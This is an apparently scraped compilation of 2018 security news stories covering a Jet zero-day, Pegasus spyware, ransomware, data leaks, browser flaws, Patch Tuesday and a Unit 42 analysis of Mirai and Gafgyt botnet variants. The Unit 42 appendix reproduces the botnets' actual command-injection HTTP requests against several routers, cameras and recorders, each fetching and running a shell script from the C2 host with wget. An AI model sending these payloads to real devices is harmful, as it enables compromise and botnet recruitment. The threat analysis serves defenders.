Researcher Discloses New Zero-Day Affecting All Versions of Windows

A security researcher has publicly disclosed an unpatched zero-day vulnerability in all supported versions of Microsoft Windows operating system (including server editions) after the company failed to patch a responsibly disclosed bug within the 120-days deadline.

Discovered by Lucas Leong of the Trend Micro Security Research team, the zero-day vulnerability resides in Microsoft Jet Database Engine that could allow an attacker to remotely execute malicious code on any vulnerable Windows computer.

The Microsoft JET Database Engine, or simply JET (Joint Engine Technology), is a database engine integrated within several Microsoft products, including Microsoft Access and Visual Basic.

According to the an advisory released by Zero Day Initiative (ZDI), the vulnerability is due to a problem with the management of indexes in the Jet database engine that, if exploited successfully, can cause an out-out-bounds memory write, leading to remote code execution.

An attacker must convince a targeted user into opening a specially crafted JET database file in order to exploit this vulnerability and remotely execute malicious code on a targeted vulnerable Windows computer.

“Crafted data in a database file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code under the context of the current process,” Trend Micro’s Zero Day Initiative wrote in its blog post.

“Various applications use this database format. An attacker using this would be able to execute code at the level of the current process.”

According to the ZDI researchers, the vulnerability exists in all supported Windows versions, including Windows 10, Windows 8.1, Windows 7, and Windows Server Edition 2008 to 2016.

ZDI reported the vulnerability to Microsoft on May 8, and the tech giant confirmed the bug on 14 May, but failed to patch the vulnerability and release an update within a 120-day (4 months) deadline, making ZDI go public with the vulnerability details.

Proof-of-concept exploit code for the vulnerability has also been published by the Trend Micro its GitHub page.

Microsoft is working on a patch for the vulnerability, and since it was not included in September Patch Tuesday, you can expect the fix in Microsoft’s October patch release.

Trend Micro recommends all affected users to “restrict interaction with the application to trusted files,” as a mitigation until Microsoft comes up with a patch.

Go to Source

Powerful Android and iOS Spyware Found Deployed in 45 Countries

One of the world’s most dangerous Android and iPhone spyware program has been found deployed against targets across 45 countries around the world over the last two years, a new report from Citizen Lab revealed.

The infamous spyware, dubbed Pegasus, is developed by NSO Group—an Israeli company which is mostly known for selling high-tech surveillance tools capable of remotely cracking into iPhones and Android devices to intelligence agencies around the world.

Pegasus is NSO Group’s most powerful creation that has been designed to hack iPhone, Android, and other mobile devices remotely, allowing an attacker to access an incredible amount of data on a target victim, including text messages, calendar entries, emails, WhatsApp messages, user’s location, microphone, and camera—all without the victim’s knowledge.

Pegasus has previously been used to target human rights activists and journalists, from Mexico to the United Arab Emirates.

Just last month, The Hacker News reported that this nasty spyware was used against one of the staffers of Amnesty International—one of the most prominent non-profit human rights organizations in the world—earlier this year, alongside another human rights defender.

Pegasus android ios hacking software

Now, a new report released Tuesday from the University of Toronto’s Citizen Lab revealed that the Pegasus infections have victimized more countries than previously believed.

36 Pegasus Spyware Operations Found Deployed in 45 Countries

Citizen Lab last month said that it had so far counted as many as 174 publicly-reported cases of individuals worldwide “abusively targeted” with NSO spyware, but now found traces of Pegasus infections across as many as 45 countries.

According to the report, 36 Pegasus operators have been using the spyware to conduct surveillance operations in 45 countries worldwide, and at least 10 of these operators appear to be actively engaged in cross-border surveillance.

Read More: Ex-NSO Employee Caught Selling Pegasus Hacking Tool For $50 Million

The report further said that while some NSO customers may be lawfully using Pegasus, at least 6 of those countries with significant Pegasus operations were “known spyware abusers,” which means they have previously been linked to the abusive use of spyware to target civil society.

Pegasus spyware android ios hacking tool

These “known spyware abusers” include Bahrain, Kazakhstan, Mexico, Morocco, Saudi Arabia, and the United Arab Emirates.

The list of countries targeted by Pegasus includes Algeria, Bahrain, Bangladesh, Brazil, Canada, Cote d’Ivoire, Egypt, France, Greece, India, Iraq, Israel, Jordan, Kazakhstan, Kenya, Kuwait, Kyrgyzstan, Latvia, Lebanon, Libya, Mexico, Morocco, the Netherlands, Oman, Pakistan, Palestine, Poland, Qatar, Rwanda, Saudi Arabia, Singapore, South Africa, Switzerland, Tajikistan, Thailand, Togo, Tunisia, Turkey, the UAE, Uganda, the United Kingdom, the United States, Uzbekistan, Yemen, and Zambia.

Since Citizen Lab tracked down Pegasus infections by creating fingerprints for Pegasus infrastructure to identify the IP addresses associated with the same spyware system, it admitted that there could be some inaccuracies in its report, due to the possible use of VPN and satellite connections by some of its targets.

Citizen Lab is keeping those fingerprints secret for now but found they could then be detected by scanning the internet.

Spyware Creator “NSO Group” Response:

In response to the Citizen Lab report, an NSO Group spokesperson released a statement saying that the company worked in full compliance with all countries without breaking any laws, including export control regulations.

“Contrary to statements made by you, our product is licensed to government and law enforcement agencies for the sole purpose of investigating and preventing crime and terror. Our business is conducted in strict compliance with applicable export control laws,” NSO Group spokesperson Shalev Hulio told Citizen Lab.

“NSO’s Business Ethics Committee, which includes outside experts from various disciplines, including law and foreign relations, reviews and approves each transaction and is authorized to reject agreements or cancel existing agreements where there is a case of improper use.”

The NSO Group further said that there were some problems with the Citizen Lab research and that the company did not sell in many of the 45 countries listed in the report.

Go to Source

Ransomware Attack Takes Down Bristol Airport’s Flight Display Screens

Bristol Airport has blamed a ransomware attack for causing a blackout of flight information screens for two days over the weekend.

The airport said that the attack started Friday morning, taking out several computers over the airport network, including its in-house display screens which provide details about the arrival and departure information of flights.

The attack forced the airport officials to take down its systems and use whiteboards and paper posters to announce check-in and arrival information for flights going through the airport and luggage pickup points for all Friday, Saturday, and the subsequent night.

“We are currently experiencing technical problems with our flight information screens,” a post on the Bristol Airport’s official Twitter feed read on Friday.

“Flights are unaffected and details of check-in desks, boarding gates, and arrival/departure times will be made over the public address system. Additional staff are on hand to assist passengers.”

The airport also urged passengers to arrive early and “allow extra time for check-in and boarding processes,” though this two days technical meltdown caused delays in baggage handling, with customers needed to wait longer than one hour for their bags.

However, no flight delays were reportedly caused due to the cyber attack.

An airport spokesman said that the information screens went offline due to a so-called “ransomware” attack, though he confirmed that no “ransom” had been paid to get the airport systems working again.

Affected systems and flight information screens were finally restored on Sunday, officials said.

“We are grateful to passengers for their patience while we have been working to resolve issues with flight information this weekend. Digital screens are now live in arrivals and departures. Work will continue to restore complete site-wide coverage as soon as possible,” the airport tweeted on Sunday.

At the moment, it is not clear how the ransomware got into the airport systems. Bristol is carrying out an investigation to find out what happened.

Go to Source

GovPayNow.com Leaks 14M+ Records

Government Payment Service Inc. — a company used by thousands of U.S. state and local governments to accept online payments for everything from traffic citations and licensing fees to bail payments and court-ordered fines — has leaked more than 14 million customer records dating back at least six years, including names, addresses, phone numbers and the last four digits of the payer’s credit card.

Indianapolis-based GovPayNet, doing business online as GovPayNow.com, serves approximately 2,300 government agencies in 35 states. GovPayNow.com displays an online receipt when citizens use it to settle state and local government fees and fines via the site. Until this past weekend it was possible to view millions of customer records simply by altering digits in the Web address displayed by each receipt.

On Friday, Sept. 14, KrebsOnSecurity alerted GovPayNet that its site was exposing at least 14 million customer receipts dating back to 2012. Two days later, the company said it had addressed “a potential issue.”

“GovPayNet has addressed a potential issue with our online system that allows users to access copies of their receipts, but did not adequately restrict access only to authorized recipients,” the company said in a statement provided to KrebsOnSecurity.

The statement continues:

“The company has no indication that any improperly accessed information was used to harm any customer, and receipts do not contain information that can be used to initiate a financial transaction. Additionally, most information in the receipts is a matter of public record that may be accessed through other means. Nonetheless, out of an abundance of caution and to maximize security for users, GovPayNet has updated this system to ensure that only authorized users will be able to view their individual receipts. We will continue to evaluate security and access to all systems and customer records.”

In January 2018, GovPayNet was acquired by Securus Technologies, a Carrollton, Texas- based company that provides telecommunications services to prisons and helps law enforcement personnel keep tabs on mobile devices used by former inmates.

Although its name may suggest otherwise, Securus does not have a great track record in securing data. In May 2018, the New York Times broke the news that Securus’ service for tracking the cell phones of convicted felons was being abused by law enforcement agencies to track the real-time location of mobile devices used by people who had only been suspected of committing a crime. The story observed that authorities could use the service to track the real-time location of nearly any mobile phone in North America.

Just weeks later, Motherboard reported that hackers had broken into Securus’ systems and stolen the online credentials for multiple law enforcement officials who used the company’s systems to track the location of suspects via their mobile phone number.

A story here on May 22 illustrated how Securus’ site appeared to allow anyone to reset the password of an authorized Securus user simply by guessing the answer to one of three pre-selected “security questions,” including “what is your pet name,” “what is your favorite color,” and “what town were you born in”. Much like GovPayNet, the Securus Web site seemed to have been erected sometime in the aughts and left to age ungracefully for years.

Choose wisely and you, too, could gain the ability to look up anyone’s precise mobile location.

Data exposures like these are some of the most common but easily preventable forms of information leaks online. In this case, it was trivial to enumerate how many records were exposed because each record was sequential.

E-commerce sites can mitigate such leaks by using something other than easily-guessed or sequential record numbers, and/or encrypting unique portions of the URL displayed to customers upon payment.

Although fixing these information disclosure vulnerabilities is quite simple, it’s remarkable how many organizations that should know better don’t invest the resources needed to find and fix them. In August, KrebsOnSecurity disclosed a similar flaw at work across hundreds of small bank Web sites run by Fiserv, a major provider of technology services to financial institutions.

In July, identity theft protection service LifeLock fixed an information disclosure flaw that needlessly exposed the email address of millions of subscribers. And in April 2018, PaneraBread.com remedied a weakness that exposed millions of customer names, email and physical addresses, birthdays and partial credit card numbers.

Got a tip about a security vulnerability similar to those detailed above, or perhaps something more serious? Please drop me a note at krebsonsecurity @ gmail.com.

Go to Source
Author: BrianKrebs

Watch Out! This New Web Exploit Can Crash and Restart Your iPhone

It’s 2018, and just a few lines of code can crash and restart any iPhone or iPad and can cause a Mac computer to freeze.

Sabri Haddouche, a security researcher at encrypted instant messaging app Wire, revealed a proof-of-concept (PoC) web page containing an exploit that uses only a few lines of specially crafted CSS & HTML code.

Beyond just a simple crash, the web page, if visited, causes a full device kernel panic and an entire system reboot.

The Haddouche’s PoC exploits a weakness in Apple’s web rendering engine WebKit, which is used by all apps and web browsers running on the Apple’s operating system.

Since the Webkit issue failed to properly load multiple elements such as “div” tags inside a backdrop filter property in CSS, Haddouche created a web page that uses up all of the device’s resources, causing shut down and restart of the device due to kernel panic.

You can also watch the video demonstration published by the researcher, which shows the iPhone crash attack in action.

All web browsers, including Microsoft Edge, Internet Explorer, and Safari on iOS, as well as Safari and Mail in macOS, are vulnerable to this CSS-based web attack, because all of them use the WebKit rendering engine.

Windows and Linux users are not affected by this vulnerability.

The Hacker News tested the attack on different web browsers, including Chrome, Safari, and Edge (on MacBook Pro and iPhone X) and it still worked on the latest version of both macOS and iOS operating systems.

So, Apple users are advised to be vigilant while visiting any web page including the code or clicking on links sent over their Facebook or WhatsApp account, or in an email.

Haddouche has posted the source code of the CSS & HTML web page that causes this attack on his GitHub page

Haddouche said he already reported the issue to Apple about the Webkit vulnerability and the company is possibly investigating the issue and working on a fix to address it in a future release.

Go to Source

New Cold Boot Attack Unlocks Disk Encryption On Nearly All Modern PCs

Security researchers have revealed a new attack to steal passwords, encryption keys and other sensitive information stored on most modern computers, even those with full disk encryption.

The attack is a new variation of a traditional Cold Boot Attack, which is around since 2008 and lets attackers steal information that briefly remains in the memory (RAM) after the computer is shut down.

However, to make the cold boot attacks less effective, most modern computers come bundled with a safeguard, created by the Trusted Computing Group (TCG), that overwrites the contents of the RAM when the power on the device is restored, preventing the data from being read.

Now, researchers from Finnish cyber-security firm F-Secure figured out a new way to disable this overwrite security measure by physically manipulating the computer’s firmware, potentially allowing attackers to recover sensitive data stored on the computer after a cold reboot in a matter of few minutes.

“Cold boot attacks are a known method of obtaining encryption keys from devices. But the reality is that attackers can get their hands on all kinds of information using these attacks. Passwords, credentials to corporate networks, and any data stored on the machine are at risk,” the security firm warns in a blog post published today.

 

Video Demonstration of the New Cold Boot Attack

Using a simple tool, researchers were able to rewrite the non-volatile memory chip that contains the memory overwrite settings, disable it, and enable booting from external devices. You can also watch the video demonstration performing the attack below.

Like the traditional cold boot attack, the new attack also requires physical access to the target device as well as right tools to recover remaining data in the computer’s memory.

“It’s not exactly easy to do, but it is not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out,” says F-Secure principal security consultant Olle Segerdahl, one the two researchers.

“It’s not exactly the kind of thing that attackers looking for easy targets will use. But it is the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use.”

 

How Microsoft Windows and Apple Users Can Prevent Cold Boot Attacks

cold boot attack on full disk encryption

According to Olle and his colleague Pasi Saarinen, their new attack technique is believed to be effective against nearly all modern computers and even Apple Macs and can’t be patched easily and quickly.

The two researchers, who will present their findings today at a security conference, say they have already shared their findings with Microsoft, Intel, and Apple, and helped them explore possible mitigation strategies.

Microsoft updated its guidance on Bitlocker countermeasures in response to the F-Secure’s findings, while Apple said that its Mac devices equipped with an Apple T2 Chip contain security measures designed to protect its users against this attack.

But for Mac computers without the latest T2 chip, Apple recommended users to set a firmware password in order to help harden the security of their computers.

Intel has yet to comment on the matter.

The duo says there’s no reliable way to “prevent or block the cold boot attack once an attacker with the right know-how gets their hands on a laptop,” but suggest the companies can configure their devices so that attackers using cold boot attacks won’t find anything fruitful to steal.

Meanwhile, the duo recommends IT departments to configure all company computers to either shut down or hibernate (not enter sleep mode) and require users to enter their BitLocker PIN whenever they power up or restore their PCs.

Attackers could still perform a successful cold boot attack against computers configured like this, but since the encryption keys are not stored in the memory when a machine hibernates or shuts down, there will be no valuable information for an attacker to steal.

Go to Source

Beware! Unpatched Safari Browser Hack Lets Attackers Spoof URLs

A security researcher has discovered a serious vulnerability that could allow attackers to spoof website addresses in the Microsoft Edge web browser for Windows and Apple Safari for iOS.

While Microsoft fixed the address bar URL spoofing vulnerability last month as part of its monthly security updates, Safari is still unpatched, potentially leaving Apple users vulnerable to phishing attacks.

The phishing attacks today are sophisticated and increasingly more difficult to spot, and this newly discovered vulnerability takes it to another level that can bypass basic indicators like URL and SSL, which are the first things a user checks to determine if a website is fake.

Discovered by Pakistan-based security researcher Rafay Baloch, the vulnerability (CVE-2018-8383) is due to a race condition type issue caused by the web browser allowing JavaScript to update the page address in the URL bar while the page is loading.

Here’s How the URL Spoofing Vulnerability Works

Successful exploitation of the flaw could potentially allow an attacker to initially start loading a legitimate page, which would cause the page address to be displayed in the URL bar, and then quickly replace the code in the web page with a malicious one.

“Upon requesting data from a non-existent port the address was preserved and hence a due to race condition over a resource requested from non-existent port combined with the delay induced by setInterval function managed to trigger address bar spoofing,” Baloch explains on his blog.

“It causes the browser to preserve the address bar and to load the content from the spoofed page. The browser will however eventually load the resource, however the delay induced with setInterval function would be enough to trigger the address bar spoofing.”

Since the URL displayed in the address bar does not change, the phishing attack would be difficult for even a trained user to detect.

Using this vulnerability, an attacker can impersonate any web page, including Gmail, Facebook, Twitter, or even bank websites, and create fake login screens or other forms to steal credentials and other data from users, who see the legitimate domain in the address bar.

Baloch created a proof-of-concept (PoC) page to test the vulnerability, and observed that both Microsoft Edge and Apple Safari browsers “allowed javascript to update the address bar while the page was still loading.”

Proof-of Concept Video Demonstrations

The researcher has also published proof of concept videos for both Edge and Safari:

 

According to Baloch, both Google Chrome and Mozilla Firefox web browsers are not affected by this vulnerability.

While Microsoft had already patched the issue last month with its Patch Tuesday updates for August 2018, Baloch has yet to get a response from Apple about the flaw he reported to the company back on June 2.

The researcher disclosed the full technical details of the vulnerability and proof-of-concept (PoC) code for Edge only after the 90-day disclosure window, but he is holding the proof-of-concept code for Safari until Apple patches the issue in the upcoming version of Safari.

Go to Source

Microsoft Patch Tuesday – September 2018

Microsoft released its monthly set of security updates today for a variety of its products that address a variety of bugs. The latest Patch Tuesday covers 61 vulnerabilities, 17 of which are rated “critical,” 43 that are rated “important” and one that is considered to have “moderate” severity.

The advisories cover bugs in the Internet Explorer web browser, Jet Database Engine and the Chakra scripting engine, among other products and software.

This update also includes two critical advisories, one of which covers security updates to Adobe Flash, and another that deals with a denial-of-service vulnerability in the Microsoft Windows operating system.

CRITICAL VULNERABILITIES

Microsoft released coverage for 17 critical bugs. Cisco Talos believes 16 of these are of special importance and need to be addressed by users immediately.

CVE-2018-0965 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. An attacker can exploit this vulnerability by running a specially crafted application on a guest system that would cause the system operating Hyper-V to execute arbitrary code. The flaw lies in the way that Hyper-V validates inputs from an authenticated user on a guest OS.

CVE-2018-8367 is a remote code execution vulnerability in the Chakra scripting engine. The engine improperly handles objects in memory in the Microsoft Edge web browser that could allow an attacker to corrupt the system’s memory and execute arbitrary code with the user’s credentials.

CVE-2018-8420 is a remote code execution vulnerability in Microsoft XML Core Services MSXML. An attacker could trick the user into visiting a specially crafted, malicious website designed to invoke MSXML through a web browser, allowing the attacker to eventually run code and take control of the user’s system.

CVE-2018-8461 is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. This bug could corrupt memory in a way that an attacker could execute arbitrary code with the same rights as the current user. A user would need to visit a specially crafted, malicious website to trigger this vulnerability.

CVE-2018-8475 is a remote code execution vulnerability in Windows OS, which exists due to the image-loading functionality improperly handling malformed image files. An attacker could exploit this bug by convincing a user to load a malformed image file from either a web page, email or other method.

CVE-2018-8332 is a remote code execution vulnerability in the Windows font library. There are multiple ways in which an attacker could exploit this flaw, including convincing the user to click on a malicious web page or providing the user with a specially crafted, malicious document.

CVE-2018-8391 is a remote code execution vulnerability in the Chakra scripting engine. An attacker can exploit this flaw if a user is logged on with an administrative account.

CVE-2018-8439 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. The bug exists in Hyper-V’s validation on a host server. An attacker can exploit this flaw by running a specially crafted application on a guest operating system that could lead to the machine running Hyper-V executing arbitrary code.

CVE-2018-8447 is a remote code execution vulnerability in Internet Explorer. An attacker could exploit this vulnerability by tricking a user into visiting a specially crafted web page while using the Internet Explorer browser, or by taking advantage of a compromised website through advertisements or attachments that the user would have to click on.

CVE-2018-8456 and CVE-2018-8459 are remote code execution vulnerabilities that exist in the Chakra scripting engine’s handling of objects in memory. This bug could corrupt memory in a way that an attacker could execute arbitrary code with the same rights as the current user.

CVE-2018-8457 is a remote code execution vulnerability that exists in the way Microsoft web browsers’ scripting engines handle objects in memory. An attacker could host a specially crafted website to exploit this vulnerability, and then convince the user to visit the website while using a Microsoft web browser, or they could embed an ActiveX control that is marked “safe for initialization” in a Microsoft Office file or an application that hosts the browser’s rendering engine.

CVE-2018-8464 is a remote code execution vulnerability in Microsoft Edge’s PDF reader that exists in the way the reader handles objects in memory. An attacker could exploit this bug by convincing a user to click on a web page that contains a malicious PDF, or by hosting the PDF on websites that host user-provided content.

CVE-2018-8465CVE-2018-8466 and CVE-2018-8467 are remote code execution vulnerabilities in the Chakra scripting engine that lie in the way it handles objects in memory in the Microsoft Edge web browser. An attacker can exploit these bugs by tricking the user into opening a malicious web page, or an advertisement that is hosted on a website that allows user-provided content.

The other critical vulnerability is:

IMPORTANT VULNERABILITIES

There is also coverage for 43 important vulnerabilities, 11 of which we wish to highlight.

CVE-2018-8354 is a remote code execution vulnerability that exists in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. A user would need to visit a specially crafted, malicious website in order to trigger this vulnerability.

CVE-2018-8392 and CVE-2018-8393 are buffer overflow vulnerabilities in the Microsoft Jet Database Engine. To exploit these bugs, a user must open a specially crafted Excel file while using an at-risk version of Windows. An attacker could exploit these vulnerabilities to execute code on the victim’s machine at an administrator’s level.

CVE-2018-8430 is a remote code execution vulnerability in Microsoft Word 2013 and 2016. An attacker can exploit this by tricking a user into opening a specially crafted, malicious PDF.

CVE-2018-8447 is an elevation of privilege vulnerability that lies in the way Windows processes calls to Advanced Local Procedure Call (ALPC). An attacker would need to log onto the system directly in order to exploit this vulnerability, and then run a specially crafted application.

CVE-2018-8331 is a remote code execution vulnerability in Microsoft Excel that exists when the software fails to correctly handle objects in memory. A user could trigger this bug by opening a specially crafted, malicious file in an email or on a web page.

CVE-2018-8315 is an information disclosure vulnerability in Microsoft’s scripting engine that could expose uninitialized memory if exploited. An attacker could access this information by convincing a user to visit a malicious website and then leveraging the vulnerability to obtain privileged data from the browser process.

CVE-2018-8335 is a denial-of-service vulnerability in the Microsoft Server Block Message (SMB). An attacker can send a specially crafted request to the server to trigger this vulnerability.

CVE-2018-8425 is a spoofing vulnerability in the Microsoft Edge web browser. The bug lies in the way the browser handles specific HTML content. If an attacker correctly exploits this bug, a user could be tricked into thinking they are visiting a legitimate website when they are actually on a malicious page.

CVE-2018-8440 is an elevation of privilege vulnerability that occurs when Windows incorrectly handles calls to Advanced Local Procedure Call (APLC). An attacker needs to log onto the system directly to exploit this vulnerability, and then run a specially crafted application to take over the system. This vulnerability has been spotted in the wild as part of several pieces of malware.

The other vulnerabilities that are rated “important” are:

Go to Source
Author: Talos Group

Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall

Executive Summary:

Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.

These variants are notable for two reasons:

  • The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
  • The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).

These developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.

All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices. For Palo Alto Networks customers, WidlFire detects all related samples with malicious verdicts. Additional protections are noted in the conclusion below.

Research:

On September 7, 2018, Unit 42 found samples of a Mirai variant that incorporates exploits targeting 16 separate vulnerabilities. While the use of multiple exploits within a single sample of Mirai has been observed in the past, this is the first known instance of Mirai targeting a vulnerability in Apache Struts.

In addition, Unit 42 found the domain that is currently hosting these Mirai samples previously resolved to a different IP address during the month of August. During that time this IP was intermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866 a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS). SonciWall has been notified of this development.

The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could indicate a larger movement from consumer device targets to enterprise targets.

Apache Struts exploit in multi-exploit Mirai variant

The exploit targeting Apache Struts in the new variant we found targets CVE-2017-5638, an arbitrary command execution vulnerability via crafted Content-Type, Content-Disposition, or Content-Length HTTP headers. Its format can be seen in Figure 1, with the payload highlighted.

SonicWall1

Figure 1 CVE-2017-5638 exploit format

The other 15 exploits incorporated in this Mirai variant are detailed in Table 2 in the Appendix below.

While these samples are variants of Mirai, they don’t include the bruteforce functionality generally used by Mirai. They use l[.]ocalhost[.]host:47883 as C2, and the same encryption scheme as Mirai with the key 0xdeadf00d.

SonicWall GMS exploit in Gafgyt variant

The domain l[.]ocalhost[.]host used for C2 and to serve payloads in the Mirai variant discussed above, has also been found associated with other Mirai activity in the past as far back as November 2016.

For part of the month of August 2018, that same domain resolved to a different IP address 185[.]10[.]68[.]127. At that time we found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older) that is not present in currently supported versions.

The vulnerability CVE-2018-9866 targeted by the exploit stems from the lack of sanitization of XML-RPC requests to the set_time_config method. Figure 2 shows the exploit used in the sample, with the payload highlighted.

SonicWall2

Figure 2 SonicWall set_time_config RCE format

These samples first surfaced on August 5, less than a week after the publication of a Metasploit module for this vulnerability. The SonicWall public advisory on the issue published on July 17, 2018, can be found here.

The samples we found are built using the Gafgyt codebase rather than Mirai. Some of the commands supported are described in the table below.

Command Description
!* SCANNER <HUAWEI/GPON/DLINK/SONICWALL/OFF> Based on arguments provided, the bot starts sending the associated exploit to devices.

·      HUAWEI: Send CVE-2017-17215 See previous campaigns)

·      GPON: Same as above

·      DLINK: Send D-Link DSL 2750B OS Command Injection (see Table 1)

·      SONICWALL: Send exploit in Figure X.

·      OFF: kills a running process associated with the bot

!* BIN_UPDATE Fetches an update from , saves it to , installs update
!* BN Launch a Blacknurse DDoS attack against : for a duration of

Table 3 Some commands supported by variant with SonicWall exploit

Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.

Conclusion

The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could be an indication of a larger movement from consumer device targets to enterprise targets.

Palo Alto Networks AutoFocus customers can track these activities using individual exploit tags:

AutoFocus customers can also use the following malware family tags:

WildFire detects all related samples with malicious verdicts.

Here is a list of other vulnerabilities targeted in the Mirai variant targeting Apache Struts:

Vulnerability Affected Devices Exploit Format
CVE-2017-5638, Devices with unpatch Apache Struts
Linksys RCE Linksys E-series devices
POST /tmBlock.cgi HTTP/1.1

Authorization: Basic YWRtaW46cG9ybmh1Yg==

Content-Type: application/x-www-form-urlencoded

Content-Length: 215



submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `wget%20http://l.ocalhost.host/lsys.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`&StartEPI=1

 

The samples contain other versions of the same exploit using GET and POST requests, aimed at

/tmBlock.cgi, /tmUnblock.cgi, /hndBlock.cgi and /hndUnblock.cgi
Vacron NVR RCE Vacron NVR Devices Similar to previous campaigns

This variant also contains a POST request version of the same exploit :

POST /board.cgi HTTP/1.1

Content-Length: 118

Content-Type: application/x-www-form-urlencoded



cmd=`wget%20http://l.ocalhost.host/vac.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`
D-Link command.php RCE Some  D-Link devices
POST /command.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Content-Length: 127



cmd=`wget%20http://l.ocalhost.host/cmdphp.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`
CCTV/DVR RCE CCTVs, DVRs from over 70 vendors Similar to previous campaigns
EnGenius RCE EnGenius EnShare IoT Gigabit Cloud Service 1.4.11
POST /web/cgi-bin/usbinteract.cgi HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 133



action=7&path="|wget%20http://l.ocalhost.host/usb.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp||
AVTECH  Unauthenticated Command Injection AVTECH IP Camera/NVR/DVR Devices
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(wget%20http://l.ocalhost.host/avtech.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp);&password=admin

Content-Type: application/x-www-form-urlencoded
CVE-2017-6884 Zyxel routers
GET /cgi-bin/luci/;stok=/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20`wget%20http://l.ocalhost.host/luci.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`&server_ip= HTTP/1.1

Accept: text/html,application/xhtml777ml,application/xml;q=0.9,image/webp,*/*;q=0.8

Referer: http://192.168.0.1/cgi-bin/luci/;stok=/expert/maintenance/diagnostic/nslookup

Accept-Language: en-US,en;q=0.8

Cookie: csd=9; sysauth=

Connection: close
NetGain ‘ping’ Command Injection NetGain Enterprise Manager 7.2.562
POST /u/jsp/tools/exec.jsp HTTP/1.1

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF

Connection: close

Pragma: no-cache

Cache-Control: no-cache

Content-Length: 206



command=cmd+%2Fc+ping&argument=127.0.0.1+%7C+`wget%20http://l.ocalhost.host/exec.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`&async_output=ping1487856455258&isWindows=false
NUUO OS Command Injection NUUO NVRmini 2 3.0.8
POST /handle_iscsi.php HTTP/1.1

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept: */*

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.8

Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin

Connection: close

Content-Length: x



act=discover&address=1.3.3.7|`wget%20http://l.ocalhost.host/iscsi.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`&port=1337
NUUOS OS Command Injection NUUO NVRmini 2 3.0.8
POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1

Cache-Control: max-age=0

Content-Length: 187

Content-Type: application/x-www-form-urlencoded

Accept: text/html,application/xhtml777ml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.8

Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en

Connection: close



bfolder=%2Fmtd%2Fblock3&bfile=|`wget%20http://l.ocalhost.host/cgisys.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`&inc_emap=no&inc_pos=no
Netgear setup.cgi unauthenticated RCE DGN1000 Netgear routers Similar to previous campaigns
HNAP SoapAction-Header Command Execution D-Link devices Similar to previous campaigns

This variant uses an effective version of the exploit as opposed to the faulty one used in the campaigns linked above i.e. it targets SOAPAction: http://purenetworks[.]com/HNAP1/GetDeviceSettings/

D-Link OS Command Injection D-Link DSL-2750B Similar to previous campaigns
JAWS Webserver authenticated shell command execution MVPower DVRs, among others Similar to previous campaigns
CVE-2018-10561, CVE-2018-10562 Dasan GPON routers Similar to previous campaigns

This variant also includes a POST request version of the same exploit

Table 2 Other exploits used in the same sample

Indicators of Compromise

Samples with Apache Struts exploit CVE-2017-5638

d6648a36f55d6b8ffd034df7d04156d31411719ce9bc28e6d30c8427feacb397

710d56a90b5f61c7ae82fcf305d23d48476e4f237ffff9d68b961171f168f255

52274c46933c20aaf64fd4c11557143fcfdc76eef192743fafd1b3a8bed3f4d2

078eef70d754e9b64bc783f085846a2e8ae419653a79ed2386c4ade86fde68cb

ef090093496ccdab506848166a07554bfa74eb98a0546171b84fc73861f67c79

49cdb537f5e4081362545532a623f597212c8cea847cf9f2b2f1fe1f3cd0ec2f

99c22a0c0e252ab123fb3167f49d94dc12960b79565ca6dfd28f2ff5b0346348

